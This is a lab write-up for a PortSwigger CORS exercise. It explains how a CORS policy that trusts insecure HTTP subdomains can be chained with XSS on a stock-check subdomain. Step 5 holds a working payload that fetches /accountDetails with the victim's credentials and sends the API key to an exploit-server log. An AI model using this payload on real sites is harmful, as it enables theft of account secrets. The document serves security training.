# CORS vulnerability with trusted insecure protocols

## Description

The website of [this lab](https://portswigger.net/web-security/cors/lab-breaking-https-attack) has an insecure CORS configuration in that it trusts all subdomains regardless of the protocol.

## Reproduction and proof of concept

1. Start Burp, foxyproxy, and with intercept off, log in to the target site and access your account page.
2. In Burp, review the history. The API key is retrieved via an AJAX request to `/accountDetails`, and the response contains the `Access-Control-Allow-Credentials` header suggesting that it may support CORS.
3. Send the request to Burp Repeater, and resubmit it with the added header `Origin: http://subdomain.lab-id` where `lab-id` is the lab domain name. The origin is reflected in the `Access-Control-Allow-Origin` header, confirming that the CORS configuration allows access from arbitrary subdomains, both HTTPS and HTTP.
4. Open a product page, click **Check stock**. It is loaded using a HTTP URL on a subdomain, and the `productID` parameter is vulnerable to [XSS](../xss/README.md). 
5. Create exploit ((replacing `lab-id` and `exploit-server-id`):

```text
<script>
    document.location="http://stock.lab-id.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://lab-id.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-server-id.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

6. Go to the exploit server and enter the exploit in the body field of the form.
7. Click **View exploit** and check you land on the log page and your API key is in the URL. 
8. **Deliver exploit to victim**.
9. Go to **Access log**
10. Copy the administrator's API key, and enter it as solution to the lab.

## Exploitability

_If an on-path attack (MitM) between server and victim was possible, a connection to an insecure subdomain could be hijacked, and malicious JavaScript injected to exploit the CORS configuration. Unfortunately, in this lab environment on-path is not possible, so we used an alternative way of injecting JavaScript into the subdomain._
